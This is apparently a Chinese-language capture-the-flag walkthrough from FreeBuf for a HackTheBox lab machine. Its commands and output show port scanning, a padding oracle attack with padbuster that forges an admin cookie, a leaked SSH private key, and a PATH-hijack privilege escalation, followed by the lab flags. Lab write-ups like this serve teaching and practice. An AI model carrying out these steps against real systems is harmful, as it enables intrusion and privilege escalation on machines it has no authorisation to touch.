官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
maptnh- 关注
本文由
maptnh 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.18 | TCP:22,80 |
$ ip='10.10.10.18'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 e1921b48f89b6396d4e57a405fa4c833 (DSA)
| 2048 afa00f26cd1ab51fa7ec4094ef3c815f (RSA)
| 256 11a32f257367af701856fea2e35481e8 (ECDSA)
|_ 256 96819cf4b7bc1a7305eaba4135a466b7 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: CompanyDev
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Padding Oracle
http://10.10.10.18/register.php
Cookie: auth=5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc' or '1'='1--+
Invalid padding 提示说明可能该auth字段似乎是进行AES_CBC的。
Padding Oracle 攻击利用服务器对 填充错误信息 的不同响应,逐字节推测密文内容。攻击者通过篡改密文并观察服务器返回的 padding error,逐步恢复原始明文,甚至伪造合法密文。这种攻击主要针对 AES-CBC 等带填充的加密模式。防御方法包括隐藏错误信息、使用 AES-GCM、在解密前验证完整性。
1.计算区块大小
$ printf '5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc' | base64 -d | xxd
为24字节,区块为8的倍数关系。大概率会是8。
2.解密
$ padbuster http://10.10.10.18/index.php 5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc 8 -cookies auth=5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc -encoding 0
选长度15
2
明文结构是 user=xxxx
$ padbuster http://10.10.10.18/index.php 5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc 8 -cookies auth=5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc -encoding 0 -plaintext user=admin
BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
http://10.10.10.18/mysshkeywithnamemitsos
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqIkk7+JFhRPDbqA0D1ZB4HxS7Nn6GuEruDvTMS1EBZrUMa9r
upUZr2C4LVqd6+gm4WBDJj/CzAi+g9KxVGNAoT+Exqj0Z2a8Xpz7z42PmvK0Bgkk
3mwB6xmZBr968w9pznUio1GEf9i134x9g190yNa8XXdQ195cX6ysv1tPt/DXaYVq
OOheHpZZNZLTwh+aotEX34DnZLv97sdXZQ7km9qXMf7bqAuMop/ozavqz6ylzUHV
YKFPW3R7UwbEbkH+3GPf9IGOZSx710jTd1JV71t4avC5NNqHxUhZilni39jm/EXi
o1AC4ZKC1FqA/4YjQs4HtKv1AxwAFu7IYUeQ6QIDAQABAoIBAA79a7ieUnqcoGRF
gXvfuypBRIrmdFVRs7bGM2mLUiKBe+ATbyyAOHGd06PNDIC//D1Nd4t+XlARcwh8
g+MylLwCz0dwHZTY0WZE5iy2tZAdiB+FTq8twhnsA+1SuJfHxixjxLnr9TH9z2db
sootwlBesRBLHXilwWeNDyxR7cw5TauRBeXIzwG+pW8nBQt62/4ph/jNYabWZtji
jzSgHJIpmTO6OVERffcwK5TW/J5bHAys97OJVEQ7wc3rOVJS4I/PDFcteQKf9Mcb
+JHc6E2V2NHk00DPZmPEeqH9ylXsWRsirmpbMIZ/HTbnxJXKZJ8408p6Z+n/d8t5
gyoaRgECgYEA0oiSiVPb++auc5du9714TxLA5gpmaE9aaLNwEh4iLOS+Rtzp9jSp
b1auElzXPwACjKYpw709cNGV7bV8PPfBmtyNfHLeMTVf/E/jbRUO/000ZNznPnE7
SztdWk4UWPQx0lcSiShYymc1C/hvcgluKhdAi5m53MiPaNlmtORZ1sECgYEAzO61
apZQ0U629sx0OKn3YacY7bNQlXjl1bw5Lr0jkCIAGiquhUz2jpN7T+seTVPqHQbm
sClLuQ0vJEUAIcSUYOUbuqykdCbXSM3DqayNSiOSyk94Dzlh37Ah9xcCowKuBLnD
gl3dfVsRMNo0xppv4TUmq9//pe952MTf1z+7LCkCgYB2skMTo7DyC3OtfeI1UKBE
zIju6UwlYR/Syd/UhyKzdt+EKkbJ5ZTlTdRkS+2a+lF1pLUFQ2shcTh7RYffA7wm
qFQopsZ4reQI562MMYQ8EfYJK7ZAMSzB1J1kLYMxR7PTJ/4uUA4HRzrUHeQPQhvX
JTbhvfDY9kZMUc2jDN9NwQKBgQCI6VG6jAIiU/xYle9vi94CF6jH5WyI7+RdDwsE
9sezm4OF983wsKJoTo+rrODpuI5IJjwopO46C1zbVl3oMXUP5wDHjl+wWeKqeQ2n
ZehfB7UiBEWppiSFVR7b/Tt9vGSWM6Uyi5NWFGk/wghQRw1H4EKdwWECcyNsdts0
6xcZQQKBgQCB1C4QH0t6a7h5aAo/aZwJ+9JUSqsKat0E7ijmz2trYjsZPahPUsnm
+H9wn3Pf5kAt072/4N2LNuDzJeVVYiZUsDwGFDLiCbYyBVXgqtaVdHCfXwhWh1EN
pXoEbtCvgueAQmWpXVxaEiugA1eezU+bMiUmer1Qb/l1U9sNcW9DmA==
-----END RSA PRIVATE KEY-----
$ ssh mitsos@10.10.10.18 -i ./id_rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa
User.txt
347284d78bc82cf3c41d5c8e3d27336a
Privilege Escalation:PATH Hijack
$ echo -e '#!/bin/sh\n/bin/sh'> /tmp/cat;chmod +x /tmp/cat
$ PATH=/tmp:$PATH
$ /home/mitsos/backup
Root.txt
7845959f385fc8cd21ca69bebd62d09f
已在FreeBuf发表 338 篇文章
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
HackTheBox
![[Meachines] [Medium] Carrier SNMP+CW-1000-X RCE+BGP劫持权限提升](https://image.3001.net/images/20250329/1743237218_67e7b062ea4d634ec472d.png)
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升](https://image.3001.net/images/20250327/1743084170_67e55a8a64714e7b4038b.png)
- 338 文章数
- 62 关注者